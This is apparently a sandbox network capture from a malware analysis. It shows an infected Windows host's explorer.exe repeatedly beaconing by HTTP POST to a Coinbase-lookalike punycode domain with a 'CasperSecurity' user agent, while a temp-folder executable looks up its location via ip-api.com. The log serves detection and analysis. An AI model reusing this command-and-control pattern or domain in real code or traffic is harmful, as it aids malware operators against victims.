Jul 6, 2024 13:29:01.501929045 CEST	617	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1pxn23wWK4ZXPaqZVSnkTxQIoZxbGv9mHxrwXh%2FpYff4VQzKCxbEsbfBiNR0TJd13BaoYJfTanMe9sCLdn8KeK8BQeTEqF9tPJRHa2%2FPUQicPDBlGQSw5T5IgLtYoWtTxAlzJgCF%2Bm5XBs8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef412e6a5841c6-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	49925	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:01.617854118 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:01.622714043 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:02.306035042 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S%2FpT9HmdusXoNvgGej0J4iyTSbMva8pW1co8qrgWQMlnpZqgYvI0sHQV9%2BByPhNhbc4zdLTVpg57t7t1rMpd%2F2LElnSYc4SJN2tE%2Fm0tBa7fFdIAwkJtb5z373fqePTIB3tI83XsRBEDumw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef4133aebe3320-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	49927	188.114.96.3	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:02.431241035 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:02.436265945 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:03.133712053 CEST	617	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=88HijhgtEqicxlvTLZi0yfWJsozIdAr%2BgMte5Xi4Amu4pLoVZItZRY33lTtWe6KEb%2BazxIUeB2d9NC4AfnZZdFnJCvuCnP3uRcIKFYDtLhpLeQcup5hPporyaua%2FWbSbFIH07wh5okm1GKU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef4138cf7b8ce6-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	49928	208.95.112.1	80	5184	C:\Users\user\AppData\Local\Temp\jqnnpe.exe

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:02.623472929 CEST	63	OUT	GET /xml HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jul 6, 2024 13:29:03.094541073 CEST	640	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:03 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 465 Access-Control-Allow-Origin: * X-Ttl: 7 X-Rl: 40 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>

Session ID	Source IP	Source Port	Destination IP	Destination Port
116	192.168.2.4	49929	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:03.242660999 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:03.249310017 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:04.418967962 CEST	625	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hh%2FTRkTu5qxi1d%2BvUYzMRiM9zO98o%2BFxl7ivyKO7cDCCtGNlBavWGb3wUNpitRWDqoh3cb3Sjz%2BIFmCtP8ZsTMB%2F8JYLTJeINaL8Q0%2Bmd2GmCFohT9MVdq50nkI8GbSZfSAgKEGaVNHn4%2Bo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef413dcd688c42-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
117	192.168.2.4	49930	208.95.112.1	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:03.301712036 CEST	63	OUT	GET /xml HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jul 6, 2024 13:29:03.764298916 CEST	640	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:03 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 465 Access-Control-Allow-Origin: * X-Ttl: 6 X-Rl: 39 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>

Session ID	Source IP	Source Port	Destination IP	Destination Port
118	192.168.2.4	49932	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:04.543667078 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:04.548959017 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:05.788850069 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dOnTFfGkgrFbxQZkrOF%2BYGqm7pzZefie16LuQ4kKGiruVX2%2FMjpCyjdmKXoP%2F%2Fz9xvfjzCTkOoj6YjMpKSXfCNs8jIL4fQ5Jga20dPyLmbc3wrwQCZCjtnE0wRDM2dtZ9d7RZd4qr4Wpjds%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef41461b8c41f3-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
119	192.168.2.4	49933	208.95.112.1	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:04.606386900 CEST	63	OUT	GET /xml HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jul 6, 2024 13:29:05.106760025 CEST	640	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:05 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 465 Access-Control-Allow-Origin: * X-Ttl: 5 X-Rl: 38 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>

Session ID	Source IP	Source Port	Destination IP	Destination Port
120	192.168.2.4	49935	208.95.112.1	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:05.586594105 CEST	39	OUT	GET /xml HTTP/1.1 Host: ip-api.com
Jul 6, 2024 13:29:06.040779114 CEST	640	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:05 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 465 Access-Control-Allow-Origin: * X-Ttl: 4 X-Rl: 37 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 71 75 65 72 79 3e 0a 20 20 3c 73 74 61 74 75 73 3e 73 75 63 63 65 73 73 3c 2f 73 74 61 74 75 73 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 63 6f 75 6e 74 72 79 3e 0a 20 20 3c 63 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 63 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 20 20 3c 72 65 67 69 6f 6e 3e 4e 59 3c 2f 72 65 67 69 6f 6e 3e 0a 20 20 3c 72 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 72 65 67 69 6f 6e 4e 61 6d 65 3e 0a 20 20 3c 63 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 63 69 74 79 3e 0a 20 20 3c 7a 69 70 3e 31 30 31 32 33 3c 2f 7a 69 70 3e 0a 20 20 3c 6c 61 74 3e 34 30 2e 37 31 32 38 3c 2f 6c 61 74 3e 0a 20 20 3c 6c 6f 6e 3e 2d 37 34 2e 30 30 36 3c 2f 6c 6f 6e 3e 0a 20 20 3c 74 69 6d 65 7a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 74 69 6d 65 7a 6f 6e 65 3e 0a 20 20 3c 69 73 70 3e 4c 65 76 65 6c 20 33 [TRUNCATED] Data Ascii: <?xml version="1.0" encoding="UTF-8"?><query> <status>success</status> <country>United States</country> <countryCode>US</countryCode> <region>NY</region> <regionName>New York</regionName> <city>New York</city> <zip>10123</zip> <lat>40.7128</lat> <lon>-74.006</lon> <timezone>America/New_York</timezone> <isp>Level 3</isp> <org>CenturyLink Communications, LLC</org> <as>AS3356 Level 3 Parent, LLC</as> <query>8.46.123.33</query></query>

Session ID	Source IP	Source Port	Destination IP	Destination Port
121	192.168.2.4	49936	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:05.900229931 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:05.906161070 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:06.621264935 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ZkVb%2BFuta6TCY3bxVOyDRC6kZZtlUcs7CuTAqEftqUPQAZ0O2Er9Vts4lOP%2FDqvMsMJF%2BvfOENh2HJYyIh1KbuHnGH%2FBl893X1The4n9XpW7Mjmy0sn2nJte%2FkQwdsxN2HhTUK6oTGCgAM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef414e6ce441e1-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
122	192.168.2.4	49939	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:06.742455959 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:06.747443914 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:07.507006884 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f3ajBFn1vOnBCejYNo8dB1xfS8TSmeTSkENjFm5BYQBcyTiirFV5RHiQgTgc%2BfP5YxYxdhThZo5fFtdHmO1XXjbkcpOsxdGUJ3oliUpIPPeh30Pu%2FRGI5eXaTvTagXNvJ%2FmX%2BIkDRA%2Bno6Y%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef4153ce4d5e71-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
123	192.168.2.4	49940	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:07.617738008 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:07.622685909 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:08.351695061 CEST	617	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zpQyiVKf6CtMeNrtfdthIKmz0sdk5UWtiB%2BgvM038tK4h9CqsJS75mJIRvh6igH9cAKq67ycEMe%2B3AsbmsVpg%2FwlEvnbuULc1dqgfGt37xfaZvgZGWc0EQ0R5VZJLWqLJ3zKpUIUUuGd5KU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef41594c31423b-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
124	192.168.2.4	49941	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:08.461582899 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:08.467904091 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:09.211308002 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2cBHD0PxSubK9YQeD3D5ee1abvBUya4%2F1QIMD1oyNWCEDQjht4%2F%2Bo115E1QMGD8SecNJ3U8QujkgIJMy781IDZcKQR7Amp%2BgpAS%2FBCeMB1CqABEaN2pmBfHjc6hBTgwrl8kQHg4EyFRz9SQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef415e9a0743ad-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
125	192.168.2.4	49943	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:09.320698023 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:09.325532913 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:10.067461014 CEST	619	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PGwspBBiofhk8wYp%2F2KF3QeWH5YZG4HuSby93Mq8LSCSOoy2anah%2Bk%2BT5tU7E0iXFyXcR6k3U0Em2fWvVY2uAplpD6eNyKRfIPuceP4hkJpjdaqJNc57VYmA26d5%2F5MEkVZzP2TQukniQ30%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef4163ec5cc472-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
126	192.168.2.4	49944	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:10.180094004 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:10.185750961 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:11.092449903 CEST	615	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LzfoVlOtyEWwpxP5B4fpEsYrVtRtEAlhsQlPzX10O%2FHFBUyKQMoPrdmdSVmMsEiM%2BwOObLf7y0nufDHqWAPoYEW36eaHrNQLOLwMrErCtnJzFtetgABojD5c2M2b1r5C7Er8TbPcfLCv0Mg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef41693cc60f73-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
127	192.168.2.4	49945	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:11.211433887 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:11.216335058 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:12.040713072 CEST	621	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MVDFjCGvacVHYzq%2FFSmllmAVllAURALn3r%2Fue7ASl4WKr29zlI5z77DQ2ArojJEgCl05kBSlZNC%2Bwxqc0oP0LkVP7BrQFvJYD7LWIzUdjc%2FqMFf9nUL3JwBxdtYJKbs%2Fvqo64aRi6yzXUzo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef416faed34308-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
128	192.168.2.4	49947	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:12.148825884 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:12.158108950 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
Jul 6, 2024 13:29:16.160640001 CEST	623	IN	HTTP/1.1 200 OK Date: Sat, 06 Jul 2024 11:29:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.12 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tuaYb9TOE3zviCgFxUAioTozf0EbMCv3tmUrS5I4ilqqjqhpNIfouUl8%2B%2B4wPl%2BHvHOr3%2FoTt7%2Fs6zE8tAcWvFgMtT7oq03ai3DYJr9GWy8JT%2BRrwZNyj35MiRXM3BkfU7uUI0tEnMWZMPs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89ef4175ae7642e7-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
129	192.168.2.4	49949	188.114.96.3	80

Timestamp	Bytes transferred	Direction	Data
Jul 6, 2024 13:29:16.276870966 CEST	192	OUT	POST /api.php?{B955B2CC07A01546086603} HTTP/1.1 Host: auth.xn--conbase-sfb.xyz Pragma: no-cache Content-type: text/html Connection: close User-Agent: CasperSecurity Content-Length: 4
Jul 6, 2024 13:29:16.283997059 CEST	6	OUT	Data Raw: 46 5a 57 56 Data Ascii: FZWV
